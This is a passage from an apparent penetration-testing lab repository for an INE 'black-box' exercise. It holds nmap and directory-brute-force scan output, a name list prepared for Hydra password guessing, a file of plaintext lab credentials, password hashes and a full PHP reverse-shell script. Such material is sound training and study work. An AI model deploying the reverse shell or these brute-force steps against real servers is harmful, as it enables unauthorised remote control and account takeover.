fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=80%CT=1%CU=32277%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=60369EA7%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=1%ISR=105%TI=Z%CI=I%II=I%\nOS:TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5\nOS:=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=\nOS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%\nOS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0\nOS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S\nOS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R\nOS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N\nOS:%T=40%CD=S)\n\nUptime guess: 0.130 days (since Wed Feb 24 10:38:11 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=249 (Good luck!)\nIP ID Sequence Generation: All zeros\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 81.49 ms 172.16.64.140\n\nNmap scan report for 172.16.64.182\nHost is up (0.067s latency).\nNot shown: 65534 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)\n| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)\n|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)\nMAC Address: 00:50:56:A2:10:16 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=30201%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=60369EA8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=104%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O\nOS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6\nOS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nUptime guess: 0.130 days (since Wed Feb 24 10:37:04 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=262 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 67.08 ms 172.16.64.182\n\nNmap scan report for 172.16.64.199\nHost is up (0.072s latency).\nNot shown: 65523 closed ports\nPORT STATE SERVICE VERSION\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n445/tcp open microsoft-ds?\n1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM\n| ms-sql-ntlm-info: \n| Target_Name: WIN10\n| NetBIOS_Domain_Name: WIN10\n| NetBIOS_Computer_Name: WIN10\n| DNS_Domain_Name: WIN10\n| DNS_Computer_Name: WIN10\n|_ Product_Version: 10.0.10586\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Issuer: commonName=SSL_Self_Signed_Fallback\n| Public Key type: rsa\n| Public Key bits: 1024\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2021-02-24T02:21:11\n| Not valid after: 2051-02-24T02:21:11\n| MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e\n|_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d\n|_ssl-date: 2021-02-24T18:46:09+00:00; +1m15s from scanner time.\n49664/tcp open msrpc Microsoft Windows RPC\n49665/tcp open msrpc Microsoft Windows RPC\n49666/tcp open msrpc Microsoft Windows RPC\n49667/tcp open msrpc Microsoft Windows RPC\n49668/tcp open msrpc Microsoft Windows RPC\n49669/tcp open msrpc Microsoft Windows RPC\n49670/tcp open msrpc Microsoft Windows RPC\n49943/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000\n| ms-sql-ntlm-info: \n| Target_Name: WIN10\n| NetBIOS_Domain_Name: WIN10\n| NetBIOS_Computer_Name: WIN10\n| DNS_Domain_Name: WIN10\n| DNS_Computer_Name: WIN10\n|_ Product_Version: 10.0.10586\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Issuer: commonName=SSL_Self_Signed_Fallback\n| Public Key type: rsa\n| Public Key bits: 1024\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2021-02-24T02:21:11\n| Not valid after: 2051-02-24T02:21:11\n| MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e\n|_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d\n|_ssl-date: 2021-02-24T18:46:09+00:00; +1m14s from scanner time.\nMAC Address: 00:50:56:A2:AD:96 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=135%CT=1%CU=30443%PV=Y%DS=1%DC=D%G=Y%M=005056%\nOS:TM=60369EA8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=I%CI=I%II=\nOS:I%SS=S%TS=A)OPS(O1=M4E7NW8ST11%O2=M4E7NW8ST11%O3=M4E7NW8NNT11%O4=M4E7NW8\nOS:ST11%O5=M4E7NW8ST11%O6=M4E7ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2\nOS:000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M4E7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=\nOS:80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3\nOS:(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%\nOS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y\nOS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R\nOS:D=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I\nOS:E(R=Y%DFI=N%T=80%CD=Z)\n\nUptime guess: 0.134 days (since Wed Feb 24 10:32:02 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=261 (Good luck!)\nIP ID Sequence Generation: Incremental\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 1m14s, deviation: 0s, median: 1m13s\n| ms-sql-info: \n| 172.16.64.199:1433: \n| Version: \n| name: Microsoft SQL Server 2014 RTM\n| number: 12.00.2000.00\n| Product: Microsoft SQL Server 2014\n| Service pack level: RTM\n| Post-SP patches applied: false\n|_ TCP port: 1433\n| nbstat: NetBIOS name: WIN10, NetBIOS user: , NetBIOS MAC: 00:50:56:a2:ad:96 (VMware)\n| Names:\n| WIN10<00> Flags: \n| WORKGROUP<00> Flags: \n|_ WIN10<20> Flags: \n| smb2-security-mode: \n| 2.02: \n|_ Message signing enabled but not required\n| smb2-time: \n| date: 2021-02-24T18:46:04\n|_ start_date: 2021-02-24T02:21:09\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 71.66 ms 172.16.64.199\n\nPost-scan script results:\n| ssh-hostkey: Possible duplicate hosts\n| Key 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519) used by:\n| 172.16.64.101\n| 172.16.64.182\n| Key 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA) used by:\n| 172.16.64.101\n| 172.16.64.182\n| Key 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA) used by:\n| 172.16.64.101\n|_ 172.16.64.182\nRead data files from: /usr/bin/../share/nmap\nOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Wed Feb 24 13:44:56 2021 -- 4 IP addresses (4 hosts up) scanned in 202.49 seconds\n" }, { "path": "ine-labs/black-box2/alive_hosts.txt", "content": "172.16.64.81\n172.16.64.91\n172.16.64.92\n172.16.64.166\n" }, { "path": "ine-labs/black-box2/dot166_DONE/dirb_scan.txt", "content": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Wed Feb 24 19:40:05 2021\nURL_BASE: http://172.16.64.166:8080/\nWORDLIST_FILES: /usr/share/dirb/wordlists/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612\n\n---- Scanning URL: http://172.16.64.166:8080/ ----\n==> DIRECTORY: http://172.16.64.166:8080/css/\n==> DIRECTORY: http://172.16.64.166:8080/img/\n+ http://172.16.64.166:8080/index.htm (CODE:200|SIZE:13098)\n==> DIRECTORY: http://172.16.64.166:8080/js/\n+ http://172.16.64.166:8080/server-status (CODE:403|SIZE:303)\n\n---- Entering directory: http://172.16.64.166:8080/css/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.166:8080/img/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.166:8080/js/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n-----------------\nEND_TIME: Wed Feb 24 19:44:30 2021\nDOWNLOADED: 4612 - FOUND: 2\n" }, { "path": "ine-labs/black-box2/dot166_DONE/for_hydra.txt", "content": "Admin\nElizabeth\nElizabeth.Lopez\nelizabeth\nelizabeth.lopez\nTara\nTara.Backer\ntara\ntara.baker\nBecky\nBecky.Casey\nbecky\nbecky.casey\nRandy\nRandy.Carlson\nrandy\nrandy.carlson\nPablo\nPablo.Roberts\npablo\npablo.roberts\nBessie\nBessie.Hammond\nbessie\nbessie.hammond\nGerardo\nGerardo.Malone\ngerardo\ngerardo.malone\nSabrina\nSabrina.Summers\nsabrina\nsabrina.summers\n" }, { "path": "ine-labs/black-box2/dot166_DONE/names.txt", "content": "Elizabeth Lopez\nTara Baker\nBecky Casey\nRandy Carlson\nPablo Roberts\nBessie Hammond\nGerardo Malone\nSabrina Summers\n" }, { "path": "ine-labs/black-box2/dot81_DONE/dirb_scan.txt", "content": "----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Wed Feb 24 18:54:17 2021\nURL_BASE: http://172.16.64.81/\nWORDLIST_FILES: /usr/share/dirb/wordlists/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612\n\n---- Scanning URL: http://172.16.64.81/ ----\n==> DIRECTORY: http://172.16.64.81/default/\n+ http://172.16.64.81/index.html (CODE:200|SIZE:11321)\n+ http://172.16.64.81/server-status (CODE:403|SIZE:300)\n==> DIRECTORY: http://172.16.64.81/webapp/\n\n---- Entering directory: http://172.16.64.81/default/ ----\n+ http://172.16.64.81/default/index.html (CODE:200|SIZE:11321)\n\n---- Entering directory: http://172.16.64.81/webapp/ ----\n==> DIRECTORY: http://172.16.64.81/webapp/assets/\n==> DIRECTORY: http://172.16.64.81/webapp/css/\n==> DIRECTORY: http://172.16.64.81/webapp/emails/\n+ http://172.16.64.81/webapp/favicon.ico (CODE:200|SIZE:300757)\n==> DIRECTORY: http://172.16.64.81/webapp/img/\n==> DIRECTORY: http://172.16.64.81/webapp/includes/\n+ http://172.16.64.81/webapp/index.php (CODE:200|SIZE:6359)\n==> DIRECTORY: http://172.16.64.81/webapp/install/\n==> DIRECTORY: http://172.16.64.81/webapp/lang/\n+ http://172.16.64.81/webapp/robots.txt (CODE:200|SIZE:206)\n==> DIRECTORY: http://172.16.64.81/webapp/templates/\n==> DIRECTORY: http://172.16.64.81/webapp/upload/\n\n---- Entering directory: http://172.16.64.81/webapp/assets/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.81/webapp/css/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.81/webapp/emails/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.81/webapp/img/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.81/webapp/includes/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.81/webapp/install/ ----\n+ http://172.16.64.81/webapp/install/index.php (CODE:200|SIZE:3018)\n\n---- Entering directory: http://172.16.64.81/webapp/lang/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.81/webapp/templates/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.81/webapp/upload/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n-----------------\nEND_TIME: Wed Feb 24 19:16:07 2021\nDOWNLOADED: 18448 - FOUND: 7\n" }, { "path": "ine-labs/black-box2/dot81_DONE/users.bak", "content": "john1:password123\npeter:youdonotguessthatone5\n" }, { "path": "ine-labs/black-box2/dot91/dirb_scan.txt", "content": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Thu Feb 25 18:26:50 2021\nURL_BASE: http://172.16.64.91:80/\nWORDLIST_FILES: /usr/share/dirb/wordlists/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612\n\n---- Scanning URL: http://172.16.64.91:80/ ----\n+ http://172.16.64.91:80/index.html (CODE:200|SIZE:11321)\n+ http://172.16.64.91:80/server-status (CODE:403|SIZE:300)\n\n-----------------\nEND_TIME: Thu Feb 25 18:38:30 2021\nDOWNLOADED: 4612 - FOUND: 2\n" }, { "path": "ine-labs/black-box2/dot91/gobuster_foocorp_scan.txt", "content": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n=====================================================\n[+] Mode : dir\n[+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/\n[+] Threads : 10\n[+] Wordlist : /usr/share/wordlists/dirb/common.txt\n[+] Status codes : 200,204,301,302,307,403\n[+] Timeout : 10s\n=====================================================\n=====================================================\n/.hta (Status: 403)\n/.htaccess (Status: 403)\n/.htpasswd (Status: 403)\n/app (Status: 301)\n/index.html (Status: 200)\n/server-status (Status: 403)\n=====================================================\n=====================================================\n" }, { "path": "ine-labs/black-box2/dot91/gobuster_foocorp_scan2.txt", "content": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n=====================================================\n[+] Mode : dir\n[+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/app/\n[+] Threads : 10\n[+] Wordlist : /usr/share/wordlists/dirb/common.txt\n[+] Status codes : 200,204,301,302,307,403\n[+] Timeout : 10s\n=====================================================\n=====================================================\n/.hta (Status: 403)\n/.htaccess (Status: 403)\n/.htpasswd (Status: 403)\n/index.php (Status: 200)\n/js (Status: 301)\n/upload (Status: 301)\n=====================================================\n=====================================================\n" }, { "path": "ine-labs/black-box2/dot91/gobuster_scan.txt", "content": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n=====================================================\n[+] Mode : dir\n[+] Url/Domain : http://172.16.64.91/\n[+] Threads : 10\n[+] Wordlist : /usr/share/wordlists/dirb/common.txt\n[+] Status codes : 200,204,301,302,307,403\n[+] Timeout : 10s\n=====================================================\n=====================================================\n/.hta (Status: 403)\n/.htpasswd (Status: 403)\n/.htaccess (Status: 403)\n/index.html (Status: 200)\n/server-status (Status: 403)\n=====================================================\n=====================================================\n" }, { "path": "ine-labs/black-box2/dot91/myapp.html", "content": "\n
\n

\n
\n
Select file to upload:\n\n\n\n

\n
\n

\n
© FooCORP 2021
\n\n" }, { "path": "ine-labs/black-box2/dot91/php-reverse-shell.php", "content": " array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\t// Check for end of TCP connection\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\t// Check for end of STDOUT\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t// Wait until a command is end down $sock, or some\n\t// command output is available on STDOUT or STDERR\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\t// If we can read from the TCP socket, send\n\t// data to process's STDIN\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\t// If we can read from the process's STDOUT\n\t// send data down tcp connection\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\t// If we can read from the process's STDERR\n\t// send data down tcp connection\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?> \n\n\n\n" }, { "path": "ine-labs/black-box2/dot92_DONE/dirb_scan.txt", "content": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Wed Feb 24 19:21:07 2021\nURL_BASE: http://172.16.64.92/\nWORDLIST_FILES: /usr/share/dirb/wordlists/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612\n\n---- Scanning URL: http://172.16.64.92/ ----\n==> DIRECTORY: http://172.16.64.92/assets/\n==> DIRECTORY: http://172.16.64.92/images/\n+ http://172.16.64.92/index.html (CODE:200|SIZE:1393)\n+ http://172.16.64.92/server-status (CODE:403|SIZE:300)\n\n---- Entering directory: http://172.16.64.92/assets/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n---- Entering directory: http://172.16.64.92/images/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n (Use mode '-w' if you want to scan it anyway)\n\n-----------------\nEND_TIME: Wed Feb 24 19:26:00 2021\nDOWNLOADED: 4612 - FOUND: 2\n" }, { "path": "ine-labs/black-box2/dot92_DONE/user-hashes.txt", "content": "c5d71f305bb017a66c5fa7fd66535b84\n14d69ee186f8d9bbeddd4da31559ce0f\n" }, { "path": "ine-labs/black-box2/thorough_nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Wed Feb 24 18:44:11 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt\nNmap scan report for 172.16.64.81\nHost is up (0.055s latency).\nNot shown: 65532 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 09:1e:bf:d0:44:0f:bc:c8:64:bd:ac:16:09:79:ca:a8 (RSA)\n| 256 df:60:fc:fc:db:4b:be:b6:3e:7a:4e:84:4c:a1:57:7d (ECDSA)\n|_ 256 ce:8c:fe:bd:76:77:8e:bd:c9:b8:8e:dc:66:b8:80:38 (ED25519)\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n13306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2\n| mysql-info: \n| Protocol: 10\n| Version: 5.7.25-0ubuntu0.16.04.2\n| Thread ID: 7\n| Capabilities flags: 63487\n| Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins\n| Status: Autocommit\n| Salt: +Y#V@\\x1D4xj/2<\\x17\\x0D\\x16\\x02TEN0\n|_ Auth Plugin Name: mysql_native_password\nMAC Address: 00:50:56:A0:8B:2B (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=31302%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O\nOS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6\nOS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nUptime guess: 0.003 days (since Wed Feb 24 18:42:27 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=258 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 54.73 ms 172.16.64.81\n\nNmap scan report for 172.16.64.91\nHost is up (0.056s latency).\nNot shown: 65533 closed ports\nPORT STATE SERVICE VERSION\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n6379/tcp open redis Redis key-value store\nMAC Address: 00:50:56:A0:8B:74 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=80%CT=1%CU=44337%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O\nOS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6\nOS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nUptime guess: 0.005 days (since Wed Feb 24 18:38:19 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=259 (Good luck!)\nIP ID Sequence Generation: All zeros\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 55.56 ms 172.16.64.91\n\nNmap scan report for 172.16.64.92\nHost is up (0.056s latency).\nNot shown: 65531 closed ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 f4:86:09:b3:d6:d1:ba:d0:28:65:33:b7:82:f7:a6:34 (RSA)\n| 256 3b:d7:39:c3:4f:c4:71:a2:16:91:d1:8f:ac:04:a8:16 (ECDSA)\n|_ 256 4f:43:ac:70:09:a6:36:c6:f5:b2:28:b8:b5:53:07:4c (ED25519)\n53/tcp open domain dnsmasq 2.75\n| dns-nsid: \n|_ bind.version: dnsmasq-2.75\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Photon by HTML5 UP\n63306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2\n| mysql-info: \n| Protocol: 10\n| Version: 5.7.25-0ubuntu0.16.04.2\n| Thread ID: 7\n| Capabilities flags: 63487\n| Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins\n| Status: Autocommit\n| Salt: g\\x04\\x1A6\\x0FqO\\x0D\\x18uo[d:I\"z/\\x10\\x11\n|_ Auth Plugin Name: mysql_native_password\nMAC Address: 00:50:56:A0:0B:82 (VMware)\nNo exact OS matches for host (If you know what OS is 